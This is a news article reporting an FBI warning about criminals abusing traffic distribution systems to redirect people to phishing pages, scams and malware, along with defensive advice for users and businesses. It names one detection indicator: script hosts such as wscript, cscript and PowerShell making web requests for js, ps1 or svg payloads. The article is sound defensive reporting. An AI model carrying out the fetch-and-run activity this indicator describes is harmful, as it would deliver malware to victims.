FBI Warns Cybercriminals Are Using Traffic Distribution Systems to Send Users to Fraud Sites
7 min. read 
Published on
The FBI is warning internet users and businesses about cybercriminals using traffic distribution systems to silently redirect people to fraudulent websites, phishing pages, malware downloads, and ransomware-related infrastructure.
The warning came through an FBI Internet Crime Complaint Center public service announcement published on June 18, 2026. The agency said criminals use malicious traffic distribution systems, also known as TDSs, to route victims through hidden redirect chains after they click ads, visit compromised pages, sign up for promotions, or download applications.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
A TDS is not malicious by default. Legitimate advertisers, publishers, and businesses use similar technology to manage web traffic. The risk comes when criminals use it to decide which users should see a scam, which users should receive malware, and which users should see harmless content to avoid detection.
What is a traffic distribution system?
A traffic distribution system sits between the first link a person clicks and the final page they see. It can evaluate a visitor in seconds and then send that visitor to a destination chosen by the operator.
In legitimate use, that may mean routing visitors to different pages by country, device type, browser, or marketing campaign. In criminal use, it can send selected victims to fake login forms, fraudulent investment pages, malicious software updates, or compromised websites.
The FBI said criminals are using TDSs to gain access to victim networks for ransomware or financial scams. The agency also warned that stolen access to accounts or networks may be sold to other criminals, including ransomware groups.
| Stage | How the attack works | Risk for users and businesses |
|---|---|---|
| Initial click | A user clicks a phishing email link, poisoned search result, ad, or compromised website link | The user may not realize the journey has changed |
| Traffic filtering | The TDS checks the visitor’s IP address, location, browser, operating system, and device | Attackers can target only useful victims |
| Hidden redirect | The system sends selected users through intermediate nodes | Security tools may struggle to trace the final destination |
| Final payload | The user lands on a phishing page, scam site, or malware download page | Credentials, money, or network access may be stolen |
Why these redirects are hard to spot
Malicious TDS activity can happen quickly and without a visible warning. A victim may click what looks like a normal ad or search result, then land on a page that closely imitates a trusted website.
The FBI says attackers can use a chain of intermediate nodes to hide the final malicious destination. This helps them bypass traditional firewall rules that block known malicious websites, because the first visible link may not be the final scam page.
The filtering feature makes the threat more difficult for defenders. A security researcher, website owner, or automated scanner may see a clean page, while a user in a targeted region gets redirected to a phishing portal or malware download.
How criminals drive users into TDS traps
Cybercriminals use several methods to push victims into malicious redirect chains. One method involves phishing emails that include links to pages controlled by attackers.
Another method involves search engine optimization poisoning, where criminals manipulate search results or place fraudulent ads that mimic legitimate sites. Users who search for a product, service, software update, or support page may click a result that looks safe.
Attackers also compromise legitimate websites. According to the IC3 alert, criminals may gain access through weak admin passwords or outdated website plugins and themes, then edit website code so visitors are sent into a malicious TDS chain.
- Phishing emails can send users to redirect pages that look harmless at first.
- Poisoned search results can place fraudulent pages near the top of search results.
- Compromised websites can redirect visitors without changing the visible site design.
- Fake software update prompts can deliver malware instead of legitimate patches.
- Stolen network access can later support ransomware or other financial crime.
What users should do now
The FBI recommends caution before clicking advertisements, especially when a link looks similar to a known brand but uses an unusual spelling, subdomain, or domain ending. Users should type important website addresses directly into the browser when dealing with banking, email, crypto, government, or business accounts.
Strong, unique passwords remain important, but they are not enough on their own. Users should enable two-factor authentication for important accounts, especially email, financial, cloud storage, and workplace services.
Users should also avoid installing software updates from random pop-ups. Operating system updates, browser updates, and app updates should come from official app stores, built-in update tools, or verified vendor websites.
| Protection step | Who should use it? | Why it helps |
|---|---|---|
| Check URLs before clicking | Everyone | Helps avoid lookalike domains and fake ads |
| Use two-factor authentication | Everyone | Reduces account takeover risk after password theft |
| Update plugins and themes | Website owners | Closes common paths used to compromise sites |
| Use a web application firewall | Businesses and site owners | Can block suspicious traffic before it reaches the site |
| Monitor endpoints for scripts | IT teams | Helps detect malicious js, ps1, and svg payload activity |
What businesses and website owners should check
Businesses should monitor endpoints for suspicious script activity. The FBI specifically called out unusual execution of wscript.exe, cscript.exe, and PowerShell scripts that make web requests for suspicious js, ps1, or svg files.
Website owners should audit CMS administrator accounts, database accounts, FTP accounts, and hosting accounts. Weak passwords, reused credentials, outdated themes, and vulnerable plugins can give attackers the access they need to modify website code.
Organizations should also train employees to recognize phishing and social engineering attempts. A malicious TDS campaign often starts with a normal-looking email, ad, or search result, so user awareness can stop the attack before the redirect chain begins.
How to report suspected TDS-related attacks
The FBI says victims should report suspected website intrusions or cybercrime through the Internet Crime Complaint Center. Reports can help investigators track related infrastructure, identify repeat activity, and warn other potential victims.
People facing an ongoing cybercrime, serious threat, or urgent security incident can also contact a local field office through the FBI cybercrime reporting page.
The main takeaway is simple: redirects are no longer just a marketing tool. Criminals now use them to filter victims, hide scam infrastructure, bypass some defenses, and deliver phishing pages or malware with little visible warning.
For individuals, careful clicking and two-factor authentication reduce the risk. For businesses, patching, account audits, endpoint monitoring, and user training should become part of the response to the latest IC3 warning and broader FBI cyber guidance.
FAQ
A traffic distribution system, or TDS, is a tool that routes web visitors to different destinations after they click a link, ad, promotion, download page, or website. Legitimate businesses use TDS technology, but criminals can abuse it to send selected users to scam pages, phishing sites, or malware downloads.
The FBI warned that cybercriminals use malicious traffic distribution systems to redirect users to fraudulent websites, steal credentials, deliver malware, and gain network access that may later support ransomware or financial scams.
Criminals may use phishing emails, poisoned search results, fraudulent ads, fake promotions, software download pages, or compromised legitimate websites to push users into a malicious redirect chain.
A malicious TDS can filter visitors by IP address, location, operating system, browser, and device type. This lets attackers show malicious content only to selected victims while showing harmless pages to researchers or security scanners.
Users should check URLs before clicking ads or unfamiliar links, avoid fake update prompts, use strong unique passwords, enable two-factor authentication, and visit sensitive websites by typing the address directly into the browser.
Businesses should patch CMS platforms, plugins, and themes, audit web hosting and administrator accounts, use strong passwords and two-factor authentication, monitor endpoints for suspicious script execution, and train employees to spot phishing attempts.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages